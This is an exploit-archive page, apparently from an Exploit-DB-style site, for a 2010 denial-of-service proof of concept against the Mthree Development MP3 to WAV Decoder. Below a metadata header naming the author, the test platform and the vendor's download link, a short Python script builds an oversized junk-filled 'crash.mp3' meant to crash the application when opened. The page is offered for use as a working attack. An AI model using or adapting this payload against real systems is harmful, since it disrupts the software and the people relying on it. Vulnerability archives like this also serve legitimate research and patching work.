[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability
# Published : 2010-08-10
# Author : Oh Yaw Theng
# Previous Title : Rosoft media player 4.4.4 SEH buffer overflow POC
# Next Title : SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit


# Exploit Title: Mthree Development MP3 to WAV Decoder (.mp3) DoS
# Date: 10 / 8 / 2010
# Author: Oh Yaw Theng
# Credit : ZAC003(4m!n) 
# Software Link: http://www.mthreedev.com/setupmp3towav.exe
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : Create the malicious .mp3 file , open up using Mthree , after that double click on the file .. Boom ! DEADBEEF !

#!/usr/bin/python

filename = "crash.mp3"

junk = "x41" * 9000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()